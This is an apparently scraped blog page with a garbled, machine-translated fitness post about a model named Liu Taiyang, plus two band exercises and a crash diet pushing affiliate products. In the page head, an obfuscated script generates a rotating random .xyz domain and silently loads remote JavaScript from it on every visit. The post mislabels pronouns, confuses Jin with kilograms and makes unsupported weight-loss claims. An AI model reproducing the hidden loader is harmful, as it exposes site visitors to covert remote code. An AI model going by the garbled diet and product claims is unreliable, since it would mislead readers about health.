<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Reduced fat,">










<meta name="description" content="**Introduction: * * some people keep fit to lose weight, some keep fit to have an excellent waist hip ratio, and some keep fit without a purpose, just like it. It’s hard for most people to believe tha">
<meta name="keywords" content="Reduced fat">
<meta property="og:type" content="article">
<meta property="og:title" content="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules">
<meta property="og:url" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/index.html">
<meta property="og:site_name" content="How to Keep Fit">
<meta property="og:description" content="**Introduction: * * some people keep fit to lose weight, some keep fit to have an excellent waist hip ratio, and some keep fit without a purpose, just like it. It’s hard for most people to believe tha">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c40a6c49-df46-4d58-a022-08b94bff2577.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/d9fe98d6-f60d-44a3-8a29-ba3000c8ee82.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/4b6502d8-90f6-46d2-a36d-bdfbc8452032.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c7f4499f-fa62-414e-9e4a-729510b71a0a.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/ce65aedd-53b4-4fc6-bd8c-f008a32d311f.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c8d08c93-5fc2-428c-b0b2-6bc7587a8635.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/271bd2d4-ee8d-469f-88b7-a3878a09cf41.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/f27d1212-6979-4078-8c59-1aaf19bedeb7.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/a0ad168b-f0bf-4d6d-8fd2-5d1069c73088.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/cb9c959d-9ec1-4c0e-9742-b68b09263488.gif">
<meta property="og:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/db80fb98-0592-4d32-8673-6dea8bed3273.gif">
<meta property="og:updated_time" content="2021-05-06T05:44:09.640Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules">
<meta name="twitter:description" content="**Introduction: * * some people keep fit to lose weight, some keep fit to have an excellent waist hip ratio, and some keep fit without a purpose, just like it. It’s hard for most people to believe tha">
<meta name="twitter:image" content="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c40a6c49-df46-4d58-a022-08b94bff2577.gif">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules | How to Keep Fit</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">How to Keep Fit</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">How to Keep Fit</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
                            
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="15af66dea7db40aeac9404abd8ac7ee3" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="957010872ca54cf98941765c8f125165" style="display: none"></div>
<div class="_fa7cdd4c68507744" data-zone="1f18e43b8b0e495c9b6b7be51eb2c8c2" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>


  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Thomas">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="How to Keep Fit">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-04-22T00:00:00+08:00">
                2021-04-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>**Introduction: * * some people keep fit to lose weight, some keep fit to have an excellent waist hip ratio, and some keep fit without a purpose, just like it. It’s hard for most people to believe that fitness is just for love. After all, fitness means sweating and hard work. But in fact, there is such a person, she is a super fitness girl - Liu Taiyang.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c40a6c49-df46-4d58-a022-08b94bff2577.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>She is a 95 year old girl from Shanxi Province. She was named the goddess of fitness, which she did not expect, but also deserved. Her first place of popularity is in a bodybuilding competition, the reason is very simple, that is too good figure. Interestingly, she was not a contestant in this competition. She became popular as a bodybuilding referee. At that time, she was more popular than the contestants.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/d9fe98d6-f60d-44a3-8a29-ba3000c8ee82.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/4b6502d8-90f6-46d2-a36d-bdfbc8452032.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>What’s so special about her figure? Looking at the photos, we can see that she has long and straight legs, a waist and abdomen without any fat, and a beautiful and tight gluteal muscle. She is the favorite of heaven.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c7f4499f-fa62-414e-9e4a-729510b71a0a.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>Her curvilinear figure and pure face form a sharp contrast, but the angel’s face and the devil’s figure can describe her appropriately. No matter from which point of view, she can only feel the symmetry of her figure, without exaggerated muscles. This kind of curve is also the dream of many girls. After all, it’s hard to imagine that a 178cm girl can have such a hot figure, but in addition to her body achievements, in fact, she has other achievements that ordinary people can’t imagine.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/ce65aedd-53b4-4fc6-bd8c-f008a32d311f.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>She is the champion of fitness model, new car model star, Miss World Tourism, Sanda King Star girl, Global Promotion Ambassador of the queen of global tourism, runner up of Olympus bodybuilding competition and the spokesperson of luxury brand up, and even more. Who can imagine that a post-95 girl can have so many achievements, in fact, the credit lies in her conscientiousness and self-discipline.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/c8d08c93-5fc2-428c-b0b2-6bc7587a8635.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>In her daily life, she often sends her life photos and fitness photos to the Internet. This perfect curve of thin waist and wide hips also makes her dress more like a fashion show, especially her figure when wearing cheongsam.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/271bd2d4-ee8d-469f-88b7-a3878a09cf41.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>So how does Liu Taiyang keep such a good figure? Today, I’d like to share with you about this fitness training and diet. If you want to have a good figure, you can learn it together. As long as we stick to it, I believe that the perfect figure curve is just around the corner! Now let’s share two exercises that can be done at home without going out.</p>
<p>#Action 1: squat with elastic circle<br><strong>Function: promote hip shaping</strong><br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/f27d1212-6979-4078-8c59-1aaf19bedeb7.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>As shown in the figure, lay the yoga mat, extend the leg into the elastic ring, and open the leg as wide as the hip. Here, you need to pay attention to the position of the elastic ring in the middle of your legs, then raise your arms forward and cross your fingers. Then inhale, bend your knees and squat slowly. Then exhale and slowly straighten your knees back to their original position** 10 times per group, 2-3 groups per day**</p>
<p>#Action 2: kick after kneeling with elastic circle<br><strong>Function: shaping buttocks</strong><br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/a0ad168b-f0bf-4d6d-8fd2-5d1069c73088.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br>As shown in the figure, put the elastic ring into the legs and pull it to the upper part of the thigh. The whole person is in a kneeling position, face down, and then support the yoga mat with both hands. Then start kicking, use the strength of the hip to make the leg kick back to the limit, and then slowly retract. Remember not to touch the mat when retracting, and then repeat** Do 15 times on the left and right sides, repeat 2-3 groups**<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/cb9c959d-9ec1-4c0e-9742-b68b09263488.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br><strong>The above two training movements can be done by both men and women. It is recommended that beginners choose a 15 pound elastic ring</strong> The elastic ring is made of natural latex, which can provide good tensile resilience. And training action is very much, the body’s major muscle groups can exercise to the basic. This kind of tool can also be carried around, and the way of fitness is simple and easy to learn. It is suitable for all people who want to make their body beautiful.<br>If you want to be beautiful, don’t hurry to prepare an elastic ring at home. The price is also very affordable. You can buy an elastic ring by drinking less than 1 cup of milk tea. Click the card below to get * * elastic ring * *.</p>
<p>#pgc-card .pgc-card-href {        text-decoration: none;         outline: none;         display: block;         width: 100%;         height: 100%;    }    # pgc-card .pgc-card- href:hover  {        text-decoration: none;    }    /* PC style * /. PGC card {box sizing: border box; height: 164px;         border: 1px solid #e8e8e8;         position: relative;         padding: 20px 94px 12px 180px;         overflow: hidden;    }    . pgc-card::after {        content: “ “;         display: block;         border-left: 1px solid #e8e8e8;         height: 120px;         position: absolute;         right: 76px;         top: 20px;    }    . pgc-cover {        position: absolute;         width: 162px;         height: 162px;         top: 0;         left: 0;         background-size: cover;    }    . pgc-content {        overflow: hidden;         position: relative;         top: 50%;        - webkit-transform: translateY(-50%);         transform: translateY(-50%);    }    . pgc-content-title {        font-size: 18px;         color: #222;         line-height: 1;         font-weight: bold;         overflow: hidden;         text-overflow: ellipsis;         white-space: nowrap;    }    . pgc-content-desc {        font-size: 14px;         color: #444;         overflow: hidden;         text-overflow: ellipsis;         padding-top: 9px;         overflow: hidden;         line-height: 1.2em;         display: -webkit-inline-box;        - webkit-line-clamp: 2;        - webkit-box-orient: vertical;    }    . pgc-content-price {        font-size: 22px;         color: #f85959;         padding-top: 18px;         line-height: 1em;    }    . pgc-card-buy {        width: 75px;         position: absolute;         right: 0;         top: 50px;         color: #406599;         font-size: 14px;         text-align: center;    }    . pgc-buy-text {        padding-top: 10px;    }    . pgc-icon-buy {        height: 23px;         width: 20px;         display: inline-block;         background: url( <a href="https://s0.pstatp.com/pgc/v2/pgc" target="_blank" rel="noopener">https://s0.pstatp.com/pgc/v2/pgc</a>_ tpl/static/image/commodity_ buy_ f2b4d1a.png);    }<br>[<br>Hip elastic ring<br>￥29.9<br>purchase<br>]( <a href="https://haohuo.jinritemai.com/views/product/item2" target="_blank" rel="noopener">https://haohuo.jinritemai.com/views/product/item2</a>? id=3432197646616521850&amp; origin_ type=2003002010&amp; origin_ id=6587612064_ 3433157599598631796&amp; alkey=1304_ 6587612064_ 6587612064_ 3433157599598631796_ 011)<br>After that, let’s talk about * * diet * * noodles.<br>Fitness three practice seven eat, so diet is crucial. Many kids want to lose weight, but they don’t know what kind of food to eat. Here I’d like to share with you a very good diet plan. It’s a plan made directly for a friend. In about 2 months, the weight has dropped 25 Jin, and the effect is very good. Here’s a comparison of her before and after effects.<br><img src="http://doumaiy.xyz/2021/04/22/Liu Taiyang, born in 1995, is 178cm tall and has a devil's figure. He is beautiful enough to break the rules/db80fb98-0592-4d32-8673-6dea8bed3273.gif" alt="Liu Taiyang, born in 1995, is 178cm tall and has a devil&#39;s figure. He is beautiful enough to break the rules"><br><strong>2 months weight loss of 25 kg diet plan:</strong><br>*<em>Breakfast: * * 2 protein, 2 whole wheat bread, 1 cup milk, half pitaya<br>*</em>Lunch: * half bowl of rice, 100g lettuce, 100g chicken breast, 80g broccoli<br>**Dinner: * a 50g milkshake and an apple<br>You can basically buy the above ingredients on the market, but milkshakes may not be sold in the market. Here I give you a very good milkshake. It is rich in collagen, low in calories, multi vitamins, and has six flavors. A meal of milkshakes has about 200 calories. It has a strong sense of satiety. It has one flavor every day, no heavy samples for a week, and it is easy to carry in small bottles, The plan I made for my friend is to use this milkshake. I lost 25 Jin in 2 months. You can choose 6 flavors. Click the card below to get it.</p>
<p>#pgc-card .pgc-card-href {        text-decoration: none;         outline: none;         display: block;         width: 100%;         height: 100%;    }    # pgc-card .pgc-card- href:hover  {        text-decoration: none;    }    /* PC style * /. PGC card {box sizing: border box; height: 164px;         border: 1px solid #e8e8e8;         position: relative;         padding: 20px 94px 12px 180px;         overflow: hidden;    }    . pgc-card::after {        content: “ “;         display: block;         border-left: 1px solid #e8e8e8;         height: 120px;         position: absolute;         right: 76px;         top: 20px;    }    . pgc-cover {        position: absolute;         width: 162px;         height: 162px;         top: 0;         left: 0;         background-size: cover;    }    . pgc-content {        overflow: hidden;         position: relative;         top: 50%;        - webkit-transform: translateY(-50%);         transform: translateY(-50%);    }    . pgc-content-title {        font-size: 18px;         color: #222;         line-height: 1;         font-weight: bold;         overflow: hidden;         text-overflow: ellipsis;         white-space: nowrap;    }    . pgc-content-desc {        font-size: 14px;         color: #444;         overflow: hidden;         text-overflow: ellipsis;         padding-top: 9px;         overflow: hidden;         line-height: 1.2em;         display: -webkit-inline-box;        - webkit-line-clamp: 2;        - webkit-box-orient: vertical;    }    . pgc-content-price {        font-size: 22px;         color: #f85959;         padding-top: 18px;         line-height: 1em;    }    . pgc-card-buy {        width: 75px;         position: absolute;         right: 0;         top: 50px;         color: #406599;         font-size: 14px;         text-align: center;    }    . pgc-buy-text {        padding-top: 10px;    }    . pgc-icon-buy {        height: 23px;         width: 20px;         display: inline-block;         background: url( <a href="https://s0.pstatp.com/pgc/v2/pgc" target="_blank" rel="noopener">https://s0.pstatp.com/pgc/v2/pgc</a>_ tpl/static/image/commodity_ buy_ f2b4d1a.png);    }<br>[<br>6 flavors of milkshake<br>￥99<br>purchase<br>]( <a href="https://haohuo.jinritemai.com/views/product/item2" target="_blank" rel="noopener">https://haohuo.jinritemai.com/views/product/item2</a>? id=3437408268618753218&amp; origin_ type=2003002010&amp; origin_ id=6587612064_ 3438483326976008177&amp; alkey=1304_ 6587612064_ 6587612064_ 3438483326976008177_ 011)<br>**Conclusion: if you want to have a good figure like Liu Taiyang, you should keep self-discipline and serious. According to the above two exercises, keep practicing every day, I believe that in time you will become the next Liu Taiyang. There is no success in the world is casual, success is to pay a certain price, it depends on whether you are willing to casually live a perfunctory life!</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Reduced-fat/" rel="tag"># Reduced fat</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/04/21/96 fitness goddess, height 179, vest line clearly visible, loved by netizens/" rel="next" title="96 fitness goddess, height 179, vest line clearly visible, loved by netizens">
                <i class="fa fa-chevron-left"></i> 96 fitness goddess, height 179, vest line clearly visible, loved by netizens
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/04/23/Hot girl after 90, hip 98cm, excellent flexibility, unlock difficult yoga posture/" rel="prev" title="Hot girl after 90, hip 98cm, excellent flexibility, unlock difficult yoga posture">
                Hot girl after 90, hip 98cm, excellent flexibility, unlock difficult yoga posture <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Thomas</p>
              <p class="site-description motion-element" itemprop="description">How to Keep Fit</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">59</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Thomas</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
